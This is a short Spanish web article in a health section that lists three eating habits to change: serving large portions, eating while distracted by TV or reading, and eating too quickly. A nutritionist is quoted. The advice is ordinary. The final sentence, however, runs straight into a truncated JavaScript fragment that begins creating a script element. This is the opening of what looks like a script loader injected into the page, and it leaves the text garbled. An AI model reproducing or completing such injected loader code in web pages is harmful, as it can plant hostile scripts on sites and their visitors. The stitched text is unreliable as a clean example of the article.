Salud y belleza » Alimentación

Alimentación, tres hábitos a modificar

Sin Comentarios

El hombre, como dicen, es un “animal de hábitos”. Bien, modificar -en verdad mejorar- la conducta alimentaria es un requisito fundamental para lograr un mejor estado físico y emocional. Sucede que, a menudo, las compulsiones, junto con otros trastornos, nos vuelven vulnerables: un hábito, no difiere demasiado de un vicio si, frente a nosotros, se presentan determinados riesgos.

A continuación presentamos un repaso con tres hábitos que se deben modificar para llevar una nutrición mucho más sana…

Porciones grandes

Efectivamente, servirse porciones grandes es una forma de atentar contra la dieta. Es preferible repetir, o no, antes que llenar el plato de comida. “Esta comprobado que para una correcta alimentación se deben servir porciones razonables: quién llena el plato termina por comer toda la porción pero, en cambio, solo una de tres personas repite cuando ese mismo plato se ha acabado” afirma Pedro Segura, nutricionista.

Alimentación automática

Comer de parado, o leyendo, o mirando TV, no está recomendado. Ocurre que, frente a este tipo de distracciones, el apetito aumenta y la comida se va más rápido pues, lógicamente, se consume sin restricciones ni atención.

Comer rápido

Otro de los hábitos que se deben cambiar tiene que ver con el modo de encarar, justamente, el plato de comida: comer lento, es fundamental. No solo por cuestiones digestivas sino para aumentar la sensación de saciedad y, a su vez, evitar compulsiones.var d=document;var s=d.createElement('script');